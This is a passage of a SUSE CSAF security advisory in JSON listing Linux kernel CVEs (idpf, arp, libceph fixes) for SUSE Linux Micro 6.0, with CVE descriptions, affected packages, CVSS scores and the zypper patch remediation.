"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
